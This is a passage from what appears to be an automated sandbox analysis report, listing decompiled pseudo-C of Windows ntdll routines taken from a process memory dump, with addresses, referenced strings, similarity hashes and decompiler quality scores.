						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01653787(_a4,  &_v352, _t80);
						}
					}
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E016195D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01653552
0x0165355a
0x0165355d
0x01653566
0x01653567
0x0165357e
0x0165358f
0x016535a1
0x016535a5
0x0165366b
0x0165366b
0x0165366d
0x01653672
0x01653679
0x01653685
0x0165368d
0x0165369d
0x016536a7
0x016536b8
0x016536c6
0x016536c7
0x016536dc
0x016536e1
0x016536e7
0x016536e9
0x016536e9
0x01653703
0x01653703
0x016535b5
0x016535c0
0x016535c4
0x00000000
0x00000000
0x016535ca
0x016535d7
0x016535e2
0x016535e6
0x016535e8
0x016535f5
0x016535fa
0x01653603
0x01653604
0x01653609
0x0165360a
0x01653612
0x01653613
0x0165361e
0x01653622
0x01653628
0x0165362f
0x0165362f
0x01653636
0x01653638
0x0165363b
0x01653642
0x01653642
0x01653636
0x01653657
0x01653657
0x0165365c
0x01653662
0x01653669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0165358F

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 2b82530bda65bca6071d7b1fdf16eeb327e1a7c8daf187f3e3ede71f4475498b
Instruction ID: 2ae42ba9f1a686201d711a3010dbd9df141704d9be70b1878369a1fe07f2bead
Opcode Fuzzy Hash: 2b82530bda65bca6071d7b1fdf16eeb327e1a7c8daf187f3e3ede71f4475498b
Instruction Fuzzy Hash: 7D4137B2D0152D9BDB61DA54CC80FEEB77DAB54754F0045E9EA09A7240DB309E88CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 016A05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E016A05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E016A07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E01619730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0169A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0169A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E016A1293(_t79, _v40, E016A07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E015F7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0169138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x016a05c5
0x016a05ca
0x016a05d3
0x016a06db
0x016a06db
0x016a06dd
0x016a06e3
0x016a06e3
0x016a05dd
0x016a05e7
0x016a05f6
0x016a0600
0x016a0607
0x016a0610
0x016a0615
0x016a061a
0x016a061c
0x016a061e
0x016a0624
0x016a0625
0x016a0627
0x016a0628
0x016a0631
0x016a0640
0x016a064d
0x016a0654
0x016a0654
0x016a0631
0x016a066d
0x016a0674
0x00000000
0x00000000
0x016a0692
0x016a069e
0x016a06b0
0x016a06a0
0x016a06a9
0x016a06a9
0x016a06b8
0x016a06d6
0x016a06d6
0x00000000

Strings

`, xrefs: 016A0633

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: cebf9c38ecf748a87d8b9c4006e038938294f268d7d072f870704ecfab88657d
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 2B3102326043166BE720DE28CD84F9B7BD9EBC4758F144229FA58DB280D770ED04CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01653884, Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01653884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E01619650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L015F4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E01619650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x01653893
0x01653896
0x01653899
0x0165389f
0x016538a0
0x016538a4
0x016538a9
0x016538ac
0x016538ad
0x016538ae
0x016538af
0x016538b1
0x016538b4
0x016538bb
0x016538bc
0x016538bd
0x016538c4
0x016538c8
0x016538ca
0x016538ca
0x016538d5
0x0165393e
0x01653940
0x01653942
0x01653952
0x01653954
0x01653961
0x01653961
0x01653967
0x0165396e
0x0165396e
0x01653947
0x0165394c
0x00000000
0x0165394c
0x016538ea
0x016538ee
0x016538f8
0x016538f9
0x016538ff
0x01653900
0x01653902
0x01653903
0x0165390b
0x0165390f
0x01653950
0x00000000
0x01653950
0x01653915
0x0165391d
0x0165391d
0x01653922
0x01653926
0x00000000
0x01653928
0x0165392b
0x0165392b
0x01653935
0x01653937
0x01653937
0x00000000
0x01653935
0x01653926
0x016538f0
0x00000000

Strings

BinaryName, xrefs: 016538B4

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 2fd0fe22f4d5fab9180eb38e860750370805e765c356681fa83ee50ee409f8b2
Instruction ID: 56f78ef853da896cd0d5b9cbf30631dce8587e0c9d06140c3cfc009f7497ce55
Opcode Fuzzy Hash: 2fd0fe22f4d5fab9180eb38e860750370805e765c356681fa83ee50ee409f8b2
Instruction Fuzzy Hash: 1031E3B290151AAFEB15DA58CD45E6BFB74FF80BA0F014169ED54AB391E7309E00C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 0160D294, Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0160D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x16cd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E015F4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0161B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E016198D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E016195D0();
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x0160d29c
0x0160d2a6
0x0160d2b1
0x0160d2b5
0x0160d2b6
0x0160d2bc
0x0160d2bd
0x0160d2be
0x0160d2bf
0x0160d2c2
0x0160d2c4
0x0160d2cc
0x0160d384
0x0160d34b
0x0160d34f
0x0160d350
0x0160d351
0x0160d35c
0x0160d35c
0x0160d2d6
0x0160d2da
0x0160d2e1
0x0160d361
0x0160d369
0x0160d36d
0x0160d2e3
0x0160d2e3
0x0160d2e3
0x0160d2e5
0x0160d2ed
0x0160d2f5
0x0160d2fa
0x0160d302
0x0160d303
0x0160d30b
0x0160d30f
0x0160d313
0x0160d318
0x0160d31c
0x0160d320
0x0160d379
0x0160d37d
0x00000000
0x00000000
0x0164affe
0x0164b001
0x0164b011
0x00000000
0x0160d322
0x0160d322
0x0160d330
0x0160d337
0x0160d35d
0x0160d339
0x0160d33f
0x0160d38c
0x0160d38c
0x0160d33f
0x0160d349
0x00000000
0x0160d349

Strings

@, xrefs: 0160D303

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: c971308a45e0ba798f98d1f8dfddc68cbefaa74ed42a6eb85991d376cd1e8f05
Instruction ID: 3346f1af7cf1302898e341fa9f541788600ef7286d5f6f02d96b2954a96b109e
Opcode Fuzzy Hash: c971308a45e0ba798f98d1f8dfddc68cbefaa74ed42a6eb85991d376cd1e8f05
Instruction Fuzzy Hash: 8B3181B15083059FC31ADFA8CD8096BBBE8FB9A654F040A2EF99593290D735DD05CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 015E1B8F, Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E015E1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0161BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0161A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0161A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L015F4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x015e1b8f
0x015e1b9a
0x015e1b9c
0x015e1b9e
0x015e1ba3
0x01637010
0x01637010
0x00000000
0x015e1ba9
0x015e1ba9
0x015e1bae
0x00000000
0x015e1bc5
0x015e1bca
0x015e1bcf
0x015e1bd0
0x015e1bd1
0x015e1bd2
0x015e1bd6
0x015e1bdc
0x015e1be0
0x01636ffc
0x01637000
0x00000000
0x01637006
0x01637009
0x01637009
0x015e1be6
0x015e1bec
0x015e1c0b
0x015e1c0b
0x015e1c0c
0x015e1c11
0x015e1c12
0x015e1c15
0x015e1c1b
0x015e1c1f
0x015e1c31
0x015e1c33
0x01637026
0x01637026
0x015e1c21
0x015e1c24
0x015e1c24
0x015e1bee
0x015e1bee
0x015e1bf2
0x015e1c3a
0x015e1bf4
0x015e1bf4
0x015e1c05
0x015e1c05
0x015e1c09
0x015e1c3e
0x00000000
0x00000000
0x00000000
0x015e1c09
0x015e1bec
0x015e1be0
0x015e1bae
0x015e1c2e

Strings

WindowsExcludedProcs, xrefs: 015E1BC5

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 957c2ce3472c4f93b5f681b56553c9e211461b01eaddbeb9dbc0a944a2eeb10e
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: D32125BA901A29ABDB269A59CD84F5FBBEDBF80610F054465FA08CF200D730DD10C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 015FF716, Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E015FF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x015ff71d
0x015ff722
0x015ff726
0x01644770
0x015ff765
0x015ff769
0x015ff769
0x015ff732
0x0164477a
0x00000000
0x0164477a
0x015ff738
0x015ff73a
0x015ff73c
0x015ff73f
0x015ff746
0x015ff778
0x015ff7a9
0x015ff7a9
0x015ff754
0x015ff75a
0x015ff75d
0x015ff75f
0x015ff761
0x015ff76f
0x015ff771
0x015ff771
0x015ff76f
0x015ff763
0x00000000
0x015ff763
0x015ff77d
0x015ff7a3
0x015ff7a5
0x00000000
0x015ff7a5
0x015ff77f
0x015ff782
0x015ff784
0x015ff786
0x00000000
0x00000000
0x00000000
0x015ff788
0x015ff748
0x015ff74d
0x015ff78d
0x015ff793
0x015ff7b7
0x015ff7bc
0x00000000
0x015ff7bc
0x015ff798
0x00000000
0x00000000
0x015ff79d
0x015ff7b0
0x00000000
0x015ff7b0
0x015ff79f
0x00000000
0x015ff74f
0x015ff74f
0x00000000
0x015ff74f

Strings

Actx , xrefs: 015FF73F

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: d21880db3b3462e4f33b01d15acef57a1fcedea8ae6fd7501d3b044d18708c0a
Instruction ID: c4f91a22ee72cf1b93c7b2a1761c9f44b7bec25d3280398c7a9997c9d8078669
Opcode Fuzzy Hash: d21880db3b3462e4f33b01d15acef57a1fcedea8ae6fd7501d3b044d18708c0a
Instruction Fuzzy Hash: 7B11B23730A6428BEB254E1D889073AF6D5FB85624F28492FE761DFBA1DB70D8418380

Uniqueness

Uniqueness Score: -1.00%

Function 01688DF1, Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E01688DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x16b0d50);
				E0162D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01665720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0162DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0162DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0162D130(_t34, _t39, _t40);
			}

0x01688df1
0x01688df1
0x01688df1
0x01688df1
0x01688df1
0x01688df1
0x01688df3
0x01688df8
0x01688dfd
0x01688e00
0x01688e0e
0x01688e2a
0x01688e36
0x01688e38
0x01688e3c
0x01688e46
0x01688e46
0x01688e36
0x01688e50
0x01688e56
0x01688e59
0x01688e5c
0x01688e60
0x01688e67
0x01688e6d
0x01688e73
0x01688e74
0x01688eb1
0x01688ebd

Strings

Critical error detected %lx, xrefs: 01688E21

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: Critical error detected %lx
API String ID: 0-802127002
Opcode ID: 5a7bf8ae23df69be0957238b1f1650d4c4d672a213f9ff5e8cfb3a6c2f6dd4d7
Instruction ID: a3f7b7c8e40f269f6e9d5bf631cbdd088321342ebd47f185d32891497ba4d6bf
Opcode Fuzzy Hash: 5a7bf8ae23df69be0957238b1f1650d4c4d672a213f9ff5e8cfb3a6c2f6dd4d7
Instruction Fuzzy Hash: D9118771D00748DADF28DFA889097DDBBB5BB14310F20426EE569AB3C2C3340602CF18

Uniqueness

Uniqueness Score: -1.00%

Function 0166FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON

Download Yara Rule

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0166FF60

Memory Dump Source

Source File: 00000005.00000002.390845850.00000000015B0000.00000040.00000001.sdmp, Offset: 015B0000, based on PE: true

Similarity

API ID:
String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
API String ID: 0-1911121157
Opcode ID: 8cce9f1bf3bb8ec07897fee883168fb5a688ea82b5f36a196d4f522fc6c13f72
Instruction ID: 37a3c14d3948095e88e0b6390b2781574ad9df4e8402a91e6f9a5eb14ec2f6d3
Opcode Fuzzy Hash: 8cce9f1bf3bb8ec07897fee883168fb5a688ea82b5f36a196d4f522fc6c13f72
Instruction Fuzzy Hash: CB112671910544EFDB22DF58CD49FE87BB2FF04704F148488F1095B6A1C7399940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 016A5BA5, Relevance: .6, Instructions: 592
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E016A5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x16b1178);
				E0162D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E016A4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0161D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E016A5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x16c60e8;
								if( *0x16c60e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x16c60e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01619710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
